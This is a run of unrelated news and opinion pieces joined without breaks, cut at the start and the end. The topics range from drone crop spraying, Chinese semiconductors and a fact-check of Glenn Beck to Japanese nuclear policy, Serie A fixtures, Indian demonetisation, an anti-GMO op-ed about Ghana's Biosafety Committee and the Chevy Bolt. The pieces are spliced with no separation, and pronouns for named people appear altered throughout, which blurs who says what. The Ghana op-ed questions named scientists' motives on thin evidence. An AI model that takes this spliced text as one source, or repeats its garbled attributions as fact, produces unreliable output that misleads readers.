Further to that, they say docking technology that would allow for automated refilling could be developed: “That's maybe further down the road, but stuff like that that's automated is no big deal any more. I think it would be easier figuring that out than trying to get these things to fly autonomously.”
RotorSpray sells the units for around $7,500, which Allan notes is comparable to the price of an ATV (and a fraction of the cost of a high-clearance sprayer.)
The concept of swarms of UAVs working together is starting to be used in other applications, and they say it's coming to Canadian farms.
“I think it's closer than we think. Even with the old camera technology that's been out for a while, people are starting to integrate that type of thing, getting more going doing the same job,” says Allan. “That's the ultimate scenario for these.”
China's semiconductor industry, one that will make the core components of smartphones and PCs, is growing fast. If you said "hey wait, supplying semiconductors for consumer electronics sounds like more of a Taiwan thing," you'd be right but outdated.
China's semiconductor sector is thriving on investment from the Beijing government's National IC Industry Investment Fund, Taipei-based market research firm TrendForce says in a media statement in October. China already has the world's biggest semiconductor market, so more work on components helps perfect a domestic supply chain and reduces reliance on imports. Annual revenue from Chinese semiconductors this year will reach 517.6 billion yuan ($78 billion), up 19.4% over 2016, TrendForce forecasts. Revenue will grow 20% this year to a new record, the research firm says. Average growth worldwide is expected at just 3.4%.
“Numerous wafer fabs in China will be entering mass production during 2018, coinciding with the start of operation of many newly established domestic companies that focus on specific IC markets,” TrendForce says in the statement. A wafer is a semiconductor; a fab, a factory.
Gaining on Taiwan
Semiconductors are supposed to be Taiwan's sweet spot. At least 130 firms here work on these components, according to the Taiwan Semiconductor Industry Association. Taiwan officials have said semiconductors will keep Taiwan's estimated $131 billion high-tech industry strong despite crushing competition from China and elsewhere to develop end-user devices such as smartphones. Taiwan's exports rose 12.5% in July partly on global demand for these chips for electronic devices, per this local news report.
The tech-dependent island semiconductor will face pressure now from China's growth, just as its tablet PC industry was doing in 2013.
Taiwan lacks the scale, domestic market size and recent infusion of government support that China has. China may also attract the best world talent, impacting Taiwan further, says Charles Chou, analyst with the Market Intelligence and Consulting Institute in Taipei.
“With China investing massively into wafer fabrication and packaging and testing service, it could cause oversupply and eventually lead to a significant price fall."
Can China chip away at TSMC?
China's semiconductors will have arrived if they start taking down the industry's global standard bearer Taiwan Semiconductor Manufacturing Co., or TSMC.
“As Chinese brands are to prioritize Chinese suppliers, it would likely squeeze their orders placed with TSMC in the future,” Chou says.
The Taiwanese contract chipmaker, with 54% of the world's market share and a growing net income of $11 billion last year, has led much of the industry in mastering ever smaller semiconductors, such as super-tiny 5-nanometer chips due to be produced in 2019 for mobile and high-speed computing.
The firm's Nasdaq-listed share prices have caught investor attention for years as a hassle-free, profitable investment. Share prices had risen about 45% year to date as of Wednesday in Asia.
A TSMC spokesperson did not answer a request for comment.
Over the next year, Chinese manufacturers will need certification that will keep foundry orders coming to Taiwanese competitors, TrendForce research manager Lin Jian-hong says. Over the next two years, Lin says, Chinese chipmakers may “not be technologically mature enough” to build semiconductors for advanced hardware.
But what happens after that depends on the world market for advanced chips under 10 nanometers over the coming five years, Lin says. A declining market for the high-end would favor Chinese producers, which so far specialize in chips for lower-end hardware.
“In the medium and long term, Chinese fabs will eventually be able to exert greater competitive pressure on TSMC and Taiwan's semiconductor sector in general,” they say. “If the demand for advanced processing is not as strong, then TSMC's long-term revenue outlook will be less positive due to the competition from Chinese fabs in the mid-range and low-end market segments.”
The confluence of elections in Israel and the possible culmination of international talks on Iran's nuclear capabilities has vaulted United States policy on Iran to the top of the national agenda.
A reader emailed us to note that on March 19, 2015, Glenn Beck -- a multiplatform commentator on the right -- took to Facebook to criticize President Barack Obama's handling of policy with Iran. Here's the beginning of the lengthy Facebook post :
"This is just Evil," Beck wrote, "A few weeks ago Obama took Hamas and Iran OFF the terror list.  They are negotiating with Iran WHILE their supreme leader said that they ‘will fly the Islamic flag of jihad over the White House.' … Christians are being liquidated, beheaded and crucified, their children being sold into slavery, their big bombing plan to stop Isis is SEVEN bombing runs a day. 7!!! How many did we run in Bosnia: 165?!!!"
Beck makes a number of claims in this short snippet, but the one that jumped out at us was that "a few weeks ago Obama took Hamas and Iran OFF the terror list." By diplomatic standards, that would be a pretty big deal, especially if it was a unilateral move before a major nuclear deal was even completed. And we certainly hadn't seen any media coverage about this happening.
Did Obama really take Hamas and Iran off the terror list? The short answer is no. Here's the long answer.
The State Department lists
The most signifcant "terror lists" are the ones maintained by the State Department. One is for " state sponsors of terrorism ." This includes countries "determined by the secretary of state to have repeatedly provided support for acts of international terrorism," and inclusion on the list establishes restrictions on foreign assistance, a ban on defense exports and sales, and a variety of financial and other restrictions.
Currently, four nations are on the list: Cuba, Sudan, Syria … and Iran, which has been on the list since Jan. 19, 1984, when Ronald Reagan was president. Nothing with this status has changed in the last few weeks.
The second State Department list includes " foreign terrorist organizations ." Under United States law, it is unlawful to knowingly provide "material support or resources" to a group on the list. Other restrictions on financing and immigration come into play as well.
Hamas -- a militant Islamic movement based in the Palestinian territories -- is on this list, and has been since Oct. 8, 1997, when Bill Clinton was president. Like Iran, it has not been taken off the relevant terror list.
So what is Beck talking about?
The Clapper report
We failed to reach Beck through a representative of their radio network, but judging by previous posts in the conservative blogosphere , we believe they were referring to the 2015 report by the director of national intelligence, James Clapper. Clapper presented the annual report -- "Worldwide Threat Assessment of the U.S. Intelligence Community" -- to the Senate Armed Services Committee on Feb. 26.
The report is divided into two parts "global threats" and "regional threats." The global section include such topics as cyber threats, counterintelligence, terrorism, weapons of mass destruction, space, organized crime, global economics and natural resources. The regional section covers most parts of the world, including the Middle East and north Africa.
Most of the recent discussion of the Clapper report on the Internet stemmed from a Hebrew-language analysis by the Meir Amit Intelligence and Terrorism Information Center, an Israeli think tank considered close to the country's military and intelligence sectors. The center's analysis received coverage in the Israeli media and then quickly spread to the United States.
The center's analysis noted that the "terrorism" section in the 2014 report mentioned both Iran and Hezbollah, but the 2015 section did not.
Before we go any further, we'll note that Beck wrote "Hamas" in their Facebook post when they presumably meant "Hezbollah," a predominantly Lebanese Shiite Muslim party and militant group that is backed by Iran and that has been on the State Department terrorism list since 1997. While Hamas was not mentioned in either of the past two Clapper reports, Hezbollah was mentioned in the terrorism section of the 2014 report but not in the terrorism section in the 2015 report. The conservative blog posts that preceded Beck's post correctly cited "Hezbollah," so we'll chalk this up to carelessness.
Now let's take a closer look at what changed between the two reports.
The strongest evidence for Beck is the disappearance of the following language, which had been included in the terrorism section of the 2014 report:
"Iran and Hizbullah are committed to defending the Asad regime and have provided support toward this end, including sending billions of dollars in military and economic aid, training pro-regime and Iraqi Shia militants, and deploying their own personnel into the country. Iran and Hizbullah view the Asad regime as a key partner in the ‘axis of resistance' against Israel and are prepared to take major risks to preserve the regime as well as their critical trans-shipment routes. Outside the Syrian theater, Iran and Lebanese Hizbullah continue to directly threaten the interests of U.S. allies. Hizbullah has increased its global terrorist activity in recent years to a level that we have not seen since the 1990s."
The 2015 report only mentions Hezbollah once, and it's in passing.
Still, we should note that the 2015 report hardly lets Iran off the hook. The report accuses Iran of:
• "Preserving (the) nuclear weapons option,"
• Remaining "an ongoing threat to US national interests because of its support to the Asad regime in Syria, promulgation of anti-Israeli policies, development of advanced military capabilities, and pursuit of its nuclear program,"
• "Pursuing policies with negative secondary consequences for regional stability and potentially for Iran,"
• And pursuing actions to protect and empower Shia communities that "are fueling growing fears and sectarian responses."
Administration officials cautioned against over-reading the choices made in Clapper's written report.
"There is no change in the U.S. intelligence community's assessment of the threat posed by Iran or Hezbollah," said Brian P. Hale, the director of public affairs in the office of the director of national intelligence. The report, Hale said, "was written to be an overview of top threats. … There were a lot of topics to consider this year -- ISIL, cyber, Ukraine-Russia, etc. Iran was included, too."
Hale added that Clapper fleshed out the national-security concerns about Iran and Hezbollah during testimony at the Senate hearing. Responding to a question from Sen. Kelly Ayotte, R-N.H., Clapper cited several entities linked to Iran, including Hezbollah, as methods for Iran to use as "a physical manifestation of their spreading their influence in the region."
And Nick Rasmussen -- director of the National Counterterrorism Center, the principal adviser to Clapper's office on intelligence operations and counterterrorism analysis -- testified on Feb. 12 that "beyond their role in Syria and Iraq, Iran and Lebanese Hezbollah remain committed to conducting terrorist activities worldwide, and we are concerned their activities could either endanger or target U.S. and other Western interests."
Reading between the lines
We see two questions here. First, is it valid for them to call the Clapper report "the terror list"? And second, are the changes in the 2015 report -- the basis for their otherwise inaccurately worded claim -- noteworthy?
On the first question, experts agreed that the phrase "terror list" is typically reserved for the one with the legal bite -- the State Department's. Beck has "no justification for calling it 'the terror list,' " said Daveed Gartenstein-Ross, a Middle East expert at the Foundation for the Defense of Democracies.
On the second question, Beck may have a point, said Rick Brennan, a senior political scientist with RAND Corp.
"The entire tenor of the 2015 report on terrorism focuses on Sunni terrorist organizations, and there is no mention of Shia terrorist organizations," Brennan said. "The reality is that that Islamist terrorism has both a Sunni and Shia variant. Focusing on one part of the problem and excluding the other is not analytically accurate."
Brennan added that they don't see any sign that Iran has "changed its behavior in exporting violence throughout the region" between 2014 and 2015, which raises the question of why the report "significantly softened the tone and tenor of the assessment" of Iran and Hezbollah.
However, Beck buried this more justifiable point under several errors and hyperbole.
Our ruling
Beck said, "A few weeks ago Obama took Hamas and Iran OFF the terror list."
Beck made a few clear mistakes here. First, it appears they mistook Hamas for Hezbollah. Second, Iran, Hamas and Hezbollah remain on the official, and legally binding, State Department terror lists, as they have for decades. Obama did nothing to change that "a few weeks ago." Beck's claim is inaccurate, so we rate it False.
TOKYO (Reuters) - Japan's ruling party on Tuesday urged the government to push for a return to nuclear power in deliberations on the best energy mix, which is likely to be opposed by a public wary about atomic energy in the wake of the Fukushima disaster in 2011.
Prime Minister Shinzo Abe's Liberal Democratic Party (LDP) said the government should boost stable “baseload” energy supplies - nuclear, coal, hydroelectric and geothermal - to about 60 percent of the total by 2030 from 40 percent now.
“We think restarting nuclear reactors and using nuclear power as a source of supply, after securing its safety, would be favourable for Japan's energy composition,” Fukushiro Nukaga, the chief of an LDP panel on energy policy, told reporters after presenting the plan to Abe.
The Ministry of Economy, Trade and Industry, which oversees the power sector, has been holding panel meetings on the energy mix since January. [ID:nL4N0V94T3]
To achieve 60 percent baseload power, nuclear would probably account for 20 percent of the total mix, the Asahi newspaper said last week, citing the difficulty of burning more coal amid a global push to cut greenhouse gases or wringing more hydro power out of Japan's heavily dammed rivers.
Nukaga declined to comment on what the nuclear proportion would be, saying that would need further discussion. The government should push for maximum use of renewables as well as boost energy conservation, they said.
All of Japan's reactors are offline as utilities strive to meet tougher standards imposed after the worst nuclear accident in a quarter of a century.
Two nuclear plants have cleared the main safety hurdles for restarts, but a wholesale return to nuclear reliance would run into big political and operational difficulties.
Opinion polls regularly show most Japanese people want to phase out nuclear power, which supplied about 29 percent of the country's power before the 2011 disaster.
Abe's coalition partner, Komeito, also wants atomic energy gradually phased out and the Asahi said some LDP members were opposed to its return.
London Venture Partners (LVP) has announced a new early stage seed fund focused primarily on the European games sector. The eponymously named ‘LVP Seed Fund I' is LVP's first fund raised from third party investors. Backers of the new fund include Asian freemium gaming giant Nexon, long-time strategy game developer Wargaming, and social gaming company Zynga's CEO Don Mattrick.
The LVP team has been investing in the sector since 2010 as a private fund. Past investments include Supercell, NaturalMotion, Playfish, Applifier and Unity — with the firm claiming some $4 billion in value being created over the past five years of its investments, via full or partial exits. It's now drawing on that game sector investment cachet to bring third party backers on board for a larger fund.
The total size of the fund is not being announced, however LVP general partner Paul Heydon told TechCrunch the plan is to make between 20 and 25 investments of up to half a million dollars each over the lifetime of the fund.
The lower end of the investment range is pegged at $50,000 — so the fund's total size has a considerable margin of between $1M and $12.5M, depending on how its investments play out (no pun intended).
“We believe the greatest amount of value is created at the seed stage. It's highly risky but we're willing to make those bets because between the three of us [Heydon, and LVP's two other general partners, David Gardner and David Lau-Kee] we've got 60 years working in the game sector,” added Heydon.
The fund will be invested “primarily” in Europe, according to Heydon. “To date all of [LVP's] investments have been in either Finland, UK, Denmark and Spain. We haven't been specifically looking in any geography, it's just that's where the deals have come that we really liked, and we decided to invest in,” they said.
“Going forward [with the new fund], we think the Nordic area there's a huge amount of things happening there. One of the reasons that we've been excited about Finland — we've done multiple investments there — is not only is there a lot of talent there, the Finnish government is incredibly supportive financially.
“They've got the Tekes program there where they're putting 30 to 40 million euros a year into tech companies in Finland. In a mix of subsidies and soft loans. And literally, for every euro we put into a company they can raise at least another euro from Tekes. So it's amazing leverage — and it's by far the best government financing available in the world as far as I know.”
Access to government financing aside, Heydon said the Nordic regional draw — and indeed the draw to Europe in general — is talent.
“We think the Nordic area in particular there's just an amazing amount of talent,” they said. “We're starting to see some more things coming out of Spain… And we're starting to see more in the UK. But that said we see deal flow from all over Europe and we keep our eyes open. We're not going to make a decision saying we're going to invest just in the Nordic area, or just here. We're focused on where the best founders are.”
“There's a huge amount of creative talent that's coming out of Europe — there always has been — but historically they haven't had the ability to raise anywhere as much capital as in the US because there just hasn't been the capital,” they added.
Heydon said another regional reality fueling the rise of European gaming success stories is startup economics: simply put, starting a business here in the Old World doesn't require as much capital to get going vs the cost of doing a startup in Silicon Valley.
“It's like night and day in terms of cost,” they said. “If you have the ability to start with less money and get going I think you've got more of an opportunity. We're very interested in really humble entrepreneurs who just want to make something happen and they've got the right talent.”
What will LVP be looking for as it spends the new fund? “It's really a bet on the team,” said Heydon. “Do they have the right creative vision. Do they have the right ability to execute. Do they have the ability to attract great people to come work for them?
“It's passion about making games. Vision to make potentially great games. And ideally the founders have worked together in another form or fashion before. If you've got those things, you've got the basics of something potentially great… You have to be making games that have the potential to be appealing to millions and millions of users in order to have the potential to build something big.”
That said, originality is also more interesting to the firm than a dev who's trying to differentiate within an existing games type, such — for instance — trying to stand out in a crowded category like casino games.
“It's really hard to differentiate vs others and therefore you have to spend a lot of money on customer acquisition to get those users — and then strategically it's just a lot better to make a new game which is just a lot of fun and you're going to get the attention of the platform owners,” added Heydon. “They're going to feature it and it gets you off to a good running start to start turning in revenues.”
In terms of game categories of primary interest to LVP for its new early stage fund, it's mostly mobile games — owing to just how fast these games can go from fledgling release to ‘Flappy Bird-sized' global phenomenon.
“Mobile is continuing to be the fastest growing category by far. Obviously the best example is Supercell which we invested in — they did almost $900 million in revenue last year… Accel Partners who led their Series A round has said this is the fastest growing company they've ever invested in. And Accel was also in Facebook,” they added.
“The ability to scale really really fast in mobile is better than any other platform has ever been before — ever. You can have literally two guys in a garage, make a game, they upload it to the various app stores, push a few buttons and boom, it's available globally. And that ability to scale globally before has never been available, to this extent, so that's really why we're most excited about mobile.”
Also of interest, what the firm terms “mid core games” — which means games that the potential to reach users who might have been playing similar types of games elsewhere and are already invested in spending time and money on the genre to ensure the game has a lifespan that's more Angry Birds than Flappy Bird.
“You don't want to make a game that does well for a few weeks and then that's it. So it's a combination of mass market appeal, good monetization, and long lifetime. That's why we're most interested in that mid core area,” Heydon added.
Serie A 2013-14: The big games
By Football Italia staff
There are some big games straight away in the Serie A 2013-14 campaign, while the Milan Derby is a Christmas treat.
The fixture list was drawn up this evening in a ceremony in Milan, as the tournament kicks off on August 24-25 and concludes on May 18 2014. Click here for the full calendar.
Roma-Lazio comes early into the campaign in Week 4, the same round as a Milan-Napoli Scudetto showdown.
Week 7 is extremely interesting, as it includes Inter-Roma, Juventus-Milan and Lazio-Fiorentina.
The Milan Derby will be just a few days before Christmas, while Walter Mazzarri and Rafa Benitez face their past in mid-December.
Also worth noting is that the final round of the season will see Juventus-Cagliari, Napoli-Verona, Milan-Sassuolo, Chievo-Inter and Fiorentina-Torino.
These are some of the most intriguing fixtures:
Week 1: Lazio-Udinese
Week 2: Juventus-Lazio
Week 3: Inter-Juventus, Sampdoria-Genoa
Week 4: Milan-Napoli, Roma-Lazio
Week 5: Inter-Fiorentina
Week 7: Inter-Roma, Juventus-Milan, Lazio-Fiorentina
Week 8: Fiorentina-Juventus, Milan-Udinese, Roma-Napoli
Week 9: Udinese-Roma
Week 10: Fiorentina-Napoli, Milan-Lazio
Week 11: Milan-Fiorentina, Udinese-Inter
Week 12: Juventus-Napoli
Week 13: Udinese-Fiorentina
Week 14: Juventus-Udinese, Lazio-Napoli
Week 15: Napoli-Udinese, Roma-Fiorentina
Week 16: Milan-Roma, Napoli-Inter
Week 17: Inter-Milan
Week 18: Juventus-Roma, Lazio-Inter
CHANDIGARH: In a damning indictment of the Indian Science Congress, Indian-born Nobel laureate Venkatraman Ramakrishnan has refused to attend the Congress ever again. When asked by TOI on Tuesday why they aren't attending the ongoing annual Science Congress in Mysuru, Venkatraman said, “I attended one day (of an earlier Congress) and very little science was discussed. It was a circus . I find that it's an organization where very little science is discussed. I will never attend a science congress again in my life.” Last year, they had objected to politics and religious ideology being mixed with science.Addressing a gathering at Panjab University earlier in the day, Venkatraman alluded to a claim made by a participant at the 2015 Congress in Mumbai about planes having been invented by a sage in the Vedic era. They said, “The idea that Indians had airplanes 2,000 years ago sounds almost essentially impossible to me. I don't believe it. The point is that if that technology was produced in a method so described that anybody could replicate it, then it becomes science.”Venkatraman, who was born in Tamil Nadu, is a structural biologist at Cambridge University; they were awarded the Nobel Prize in 2009.
A customer waits to deposit 1000 Indian rupee banknotes in a cash deposit machine at bank in Mumbai, India, November 8, 2016. REUTERS/Danish Siddiqui
MUMBAI (Reuters Breakingviews) - Counting anything in a country of India's size is a mammoth exercise. Nine months after Prime Minister Narendra Modi scrapped high-value banknotes in a clampdown on the “black economy”, there is no clarity on how much of the banned $240 billion individuals returned. Still, this has given real momentum to India's anti-corruption campaign.
India is still wondering whether the radical move was worthwhile. It was designed to force people to give up illicit wealth rather than deposit it in the bank and risk attracting the scrutiny of the taxman. So if a high proportion of notes were returned, that would suggest Indians found it easy to wash funds before recouping their full value - or that there was an embarrassing amount of fake currency circulating.
At one stage, economists hoped that would yield a bumper payout from the RBI. Now the Reserve Bank of India is paying to New Delhi less than half the annual $11.7 billion dividend it expected, probably because of costs related to the experiment.
“Demonetisation”, as the move is known, has also clearly taken its toll on consumption. Annual economic growth slipped to 6.1 percent in January to March. It has also added to stress on the rural population. The pressure mean India will now have to stretch to meet its 3.2 percent fiscal deficit target.
Yet one effect deserves more attention. Modi has changed the way rich people think and talk about compliance. This is a result of the note ban and other moves that will create a paper trail. These include forcing individuals to link their biometric identity to everything from tax returns and mobile phone numbers, to the implementation of India's new goods and services tax.
In sum, it looks like the net is closing. This week India reported a 25 percent increase in filings of income tax returns, more than twice the growth of the previous year. That is progress in a nation where less than 2 percent of people pay income tax. Corruption is the single biggest problem facing emerging economies. Modi's fix is not perfect and may prove expensive in the short-term. But unorthodox policymaking, like demonetisation, and big data might together clean things up.
Is there anything safe about Ghana's biosafety committee?
Just whose interests do Ghana's Biosafety Committee represent?
Is there anything safe about Ghana's Biosafety Committee?
Food Sovereignty Ghana, 13 August 2013
http://www.ghanaweb.com/GhanaHomePage/NewsArchive/artikel.php?ID=282297
Ghanaians may wish to ask, just whose interests do Ghana's Biosafety Committee represent? Are they interested in safety? Or are they just interested in introducing genetically engineered and patented food into Ghana?
How can we know for sure? One way to assess this issue is to highlight the forces that helped create the Biosafety law that they oversee. Another way is to examine the backgrounds and interests of the members of the Biosafety Committee.
Lets start first with the influences that shaped the writing of Ghana's Biosafety Law. There is clear evidence that it is a creation based on aggressive guidance from the US Government and the US Embassy in Accra. We know this from observation and from reading leaked US State Department cables. With the influence of the powerful biotechnology lobbies, the US embassies across the world have taken up the key economic task to open markets for the giant corporations who also are major funders of the US political class. We know about their active participation in writing Ghana's biosafety laws from cable 10ACCRA59, among others. Hillary Clinton stated that, in cooperating African countries, the US embassies “offered some assistance in drawing up the country plans". We also know that in Africa, the US has been aggressively pushing genetic engineering, GE, representing it as a weapon against hunger, and a way to cope with drought and climate change.
Why should the US embassy be so interested in helping Ghana in developing its policies for Biosafety? Perhaps there are some individuals in the embassy who truly believe the claims that GE can be beneficial because it is so widespread in their own country. However, no-one can deny the huge political influence of the biotechnology industry in the US, and how this has influenced the US embassy agenda.
So let's be clear. “Biosafety” means opening Ghana's door to genetically modified organisms, the key profit generator for agribusiness. The underlying premise we are being asked to believe is that “what is good for bio-technology companies is good for Ghana”.
Should we Ghanaians really believe this? Let's look at the evidence. In all the major countries that have adopted GMOs, including the US itself, but also Brazil, and Argentina, large scale agribusiness based on mono-cropping of GMO crops means an industrial mode of agriculture. Agribusiness has created an agro-export economy for commodities and primary goods to satisfy the needs of global markets.
This may generate export earnings for politicians, and profits for the companies, but this is an extractive model of production, which has destroyed the livelihoods, peace, and well-being of rural communities. The people who live in its way on family land they have farmed for generations are treated as having out-moded “non-viable livelihoods”, who must ultimately leave their land and communities for the urban slums. They are pushed out of the way by economic and sometimes political forces.
This has already happened in vast stretches of land in Brazil, Argentina, Uruguay, Paraguay, Bolivia through land-grabbing. It is also starting to happen in Africa. There are well-documented examples in Tanzania, Cameroon, Mali, Ethiopia, and Mozambique. Those rural people who are left, remain mostly as “contract labourers” serving the needs of agro-industrial corporations. They work as low paid labour, where they used to own their own farms. They and their families are often beset by health problems from constant exposure to the chemicals used by agribusiness that saturate the land, the water, and the air..
Is this our vision of a “modern” Ghana? Is this the future for agriculture that we want? To those who proclaim that introducing GMOs is in the best interests of small scale farmers in Ghana, do they not see the havoc that industrial agriculture, in which GMOs often play a key role, has created for farmer families in other countries?
If by chance, they are not aware of how agro-industial, GMO-centric model of agricultural production has affected other countries, let us briefly clarify them here. The main trend is that agro-industrial agriculture ultimately drives the so-called “inefficient” small scale farmers off the land. The displaced rural populations crowd together around the urban peripheries of new super-cities. The consequences of this compulsive urbanisation are marginalisation, social fragmentation, extreme insecurity, hunger, poor nutrition, rising levels of disease. All of these combines to create ever increasing social and political destabilization.
In China, the human suffering caused by this massive shift of peasant farmers to the cities was somewhat mitigated by the availability of export manufacturing jobs. But here in Ghana, can any reasonable person think that there are enough jobs around in Accra, Kumasi, and Tamale for rural youth? Is there room for a massive increase in the ranks of those engaged in “ka ya ye” in our cities?
This is only one of the negative outcomes that Ghana's Biosafety Committee, with its recent approvals for growing test fields of Bt cotton and Genetically Engineered (GE) varieties of rice, is likely to impose on us. For they see these field trials only as the beginning of a much wider program to promote GE corn, cowpeas, and sweet potatoes. What do the members of the Bio-safety think is so special about Ghana that we can avoid the negative, social, health, and environmental consequences seen in other countries? Do they really believe that what is best for the biotechnology companies, profits, and shareholders is best for the majority of Ghanaians?
Let us now examine the second question. Who are the people appointed to ensure the “biosafety” of Ghanaian citizens and the biodiversity of our mother Ghana? What are their interests? Although there are many calls for transparency, there is not much information publicly available that tells us who the members of the Biosafety Committee are, or anything about their backgrounds.
But we do know that Professor Walter Alhassan is a member of the Biosafety Committee. So let us begin by looking at their background. They have been an active and strong spokesperson for genetic engineering, more loosely termed biotechnology. Most of their education and employment have been indirectly funded by Monsanto and Syngenta. They received their PhD in Animal and Poultry Science from the University of Guelph. Multi-national companies like Monsanto, Syngenta, Bayor Crop Science, and Semex have set up in Guelph because of the ability to closely interact with research and the ease of access to human, capital, and government resources, as well as the ability to attract investment. Monsanto recruits new staff from among Guelph's students.
Professor Alhassan received their MSc in Dairy Science from the University of Wisconsin, Madison, Wisconsin. The Dairy Dept in the University of Wisconsin has been particularly active in working with Bovine Growth Hormone, which is banned in most countries outside the US. Agriculture at the University of Wisconsin receives a lot of funding from Monsanto.
They received their Certificate of Advanced Studies in Biosafety and Plant Genetic Resources Management from the University of Geneva. The University of Geneva is another hotbed of genetic modification and genetic engineering. University of Geneva Laboratory of Plant Genetics concentrates on research in gene silencing, the basis for genetic modification. They receive significant funding from Syngenta.
Professor Alhassan works closely with FARA, The Forum for Agricultural Research in Africa. They were a consultant to FARA's SABIMA project and joint author of its report. According to its website, FARA's science agenda contains 4 work streams. Two are specifically about GMOs, although they usually avoid saying that directly. The FARA Science Agenda includes support for G8 New Alliance for Food Security and Nutrition.
Despite its rhetoric of good intentions, the G8 New Alliance initiative is specifically designed to give priority to unprecedented access for multinational companies to resources in Africa. Here is most the telling quote:
"To access cash under the initiative, African governments have to make far-reaching changes to their land, seed, and farming policies."
The Guardian reports: "The new alliance will lock poor farmers into buying increasingly expensive seeds – including genetically modified seeds – allow corporate monopolies in seed selling, and escalate the loss of precious genetic diversity in seeds – absolutely key in the fight against hunger. It will also open the door to genetically modified (GM) crops in Africa by stopping farmers' access to traditional local varieties and forcing them to buy private seeds." This is also the agenda of the Gates Foundation and of AGRA.
There is much evidence contradicting the premise that “what is good for agro-industrial and biotech corporations is good for Ghana”. A review of this evidence points to a very different conclusion.
What global agro-industrial complex represents is a modern form of genetically modified colonialism. They are waging an all-out effort, country by country, to control the food supply, and especially seeds. This is the path that the Biosafety Committee is encouraging Ghana to follow.
So what is this evidence? Let us start in Europe:
First, let us consider that despite strong and angry lobbying by the US, most of Europe has so far resisted the introduction of GMOs. This already should give us Ghanaians reasons to think. Why are Europeans so opposed to GMOs? Why not embrace all those wonderful benefits being enjoyed in the US and Brazil? Why are GMOs good for Africa and not for Europe?
Secondly, a recent study in Europe shows that the only country in Europe to adopt GMOs, Spain, has already lost significant diversity among its seeds. The other European countries studied have done better in maintaining their seed diversity and productivity.
Professor Alhassan is a charming, well-educated person. We cannot know their true motivation for advocating GMOs for Ghana. But given their background, can Ghanaians really entrust them with our “biosafety”? It is clear Professor Alhassan has serious conflicts of interest being both an advocate for genetic engineering and a member of the Biosafety Committee.
We don't have a full list of the names of the other members of Ghana's Biosafety Committee. We know a couple of the names from articles in the news. The Biosafety Committee was already in place when Ghana's Biosafety Law was passed. The members were quoted as being pleased because, in their view, it meant GMOs would be allowed in Ghana.
Here are two members that were named:
*Professor Emmanuel Quaye, Chairman of the National Biosafety Committee
*Dr Yaa Osei, Member of the National Biosafety Committee.
Both Professor Quaye and Dr. Osei, along with Professor Alhassan spoke with enthusiasm of genetic engineering coming to Ghana following the passage of the Biosafety Act. Professor Quaye spoke to the press about “leading the crusade”.
Clearly, there seem to be similar deep conflict of interest problems among these other members. We cannot look into the hearts and discern the true motivations of these three well educated individuals. However, one can be forgiven for thinking that we Ghanaians are entrusting foxes to guard our chickens!
Ghanaians need to know more about their National Biosafety Committee and their interests. We should be deeply sceptical that the interests of the global agro-industrial/GMO corporations are also in the best interests of small scale Ghanaian farmers. We need to be vigilant about how agribusiness money is being used. There is a record not just of lobbying funding research, but also of bribery by Monsanto in Indonesia, Turkey and even in Canada. How can we know the various ways that Monsanto and its allies are influencing scientific or political decisions in Ghana behind the scenes with their money?
Whatever the answers to these questions, Ghanaians are entitled to know. We need a free and open debate. The Ghanaian public, particularly small scale farmers and consumers, not just scientists who are already advocates for GMOs, need to have their say. We need to ensure the well-being of our rural communities, our farm families, our local seeds, our health, and our environment. We need to ensure the biosafety of Ghanaians and the Ghanaian food supply. This is a task we cannot entrust to a small group of GMO advocates on the Biosafety committee.
"Driving an EV is, in every proof point, better than a gas-powered car, except for charging." - Shad Balch
"It's very safe to assume that this car is going to be here sooner rather than later."
The 2015 edition of the annual AltCar Expo in Santa Monica, CA in September was a relatively quiet affair. Attendance felt light compared to previous years. But that didn't mean there wasn't something happening that might have just as big an impact on the plug-in scene as anything that's ever happened in previous years at the Santa Monica Convention Center.I say this because of what GM's Shad Balch told me about Chevy's plans to market the upcoming Bolt electric car . This is GM's next-gen electric vehicle , which will have a roughly 200-mile range and may cost about $30,000 after tax incentives ( maybe ). To say he's excited to start selling this car is an understatement.Set aside the obvious challenge Chevy will have with cars named both the Volt and the Bolt, especially when some languages exchange the pronunciation of the letters B and V. Set aside the fact that, for now, Balch is dealing with their own company actively advertising against the product he's trying to get people excited about. Balch, GM's manager of new product and public policy communications, is tremendously positive about the Bolt's chances in the marketplace when it arrives in 2017 or 2018.AltCar and the concurrent National Drive Electric Week represented the Bolt's West Coast debut , and Balch told me that the car's arrival in California shows how "Detroit recognized that they need to send it out to their number one market." The car's appearance outside of the Motor City was "The most encouraging part for us out here, being in the market ... to be able to explain that we are committed to marketing this car the right way. ... We're trying to make that known as much as possible, because that is the number one criticism that we hear. That's why events like these are so important, because we can't wrap up into a 30-second spot what these cars are capable of. I can't even explain it to you in 10 minutes what it's like. But the thing is, driving an EV is, in every proof point, better than a gas-powered car, except for charging."Now, there's a fairly decent chance that GM will hit the 250,000-vehicle limit for the $7,500 federal tax incentive right about when the Bolt comes to market, so I had to ask how the Bolt gets marketed if the price tag jumps up a few thousand dollars. Balch was straightforward. "Well, we would sell fewer cars," they said. "It's pure and simple. ... We need the incentives to remain. We know that they're critical. Unlike any of the other car companies, we have data that shows that, because when the Volt first came out, it didn't qualify for [California state] incentives. When it did qualify on top of the federal incentive with the state incentive, we sold five times as many."Balch said that GM is working with regulators and policymakers to show them this data and is making the case that the incentives need to be extended and maybe expanded. Having a point-of-sale cost reduction instead of a tax rebate would help too, they said. "It's very difficult to keep everybody up to speed and for dealers to even know what the incentives currently are. It ebbs and flows. I mean here in California, we've had to have our dealers get up to speed on IOUs from the state, to all of the sudden, the cash is back so we can give you a rebate check here. We need continuity. We need a consistent policy to incentivize these cars to be purchased, at the volume and at the level that will help us sell and meet [the efficiency] standards. Because what we do know, and what we're hearing from the regulators is that they would agree that this needs to be a market-based approach."As for when the Bolt will actually be available to buy, Balch said that after the positive response to the concept at the Detroit Auto Show earlier this year, "GM leadership has essentially fast-tracked this car into production." There was an announcement that the Bolt would be built at the Orion Assembly facility near Detroit and there are Bolt mules out testing . "It's very safe to assume that this car is going to be here sooner rather than later," Balch said. "We've also committed that it's going to be a 50-state vehicle at launch. That's to show our commitment to the technology. Our hope is that it becomes a high-volume-selling car, and that it's not just for the coasts, it's not just for a certain income level, but it is a long-range EV that anybody can get themselves into. ... [This is] a good alternative to the luxury long-range EVs that are available now. It's something that people can see themselves actually affording to get into. That's the message from this car."
This post was most recently updated on October 7th, 2018
Located in the lower Washington Heights area in NYC, the Hispanic Society of America is a century-old institution often mistaken for sports or social club because of its name. No less than The New York Times described it as the “most misunderstood” place in the city.
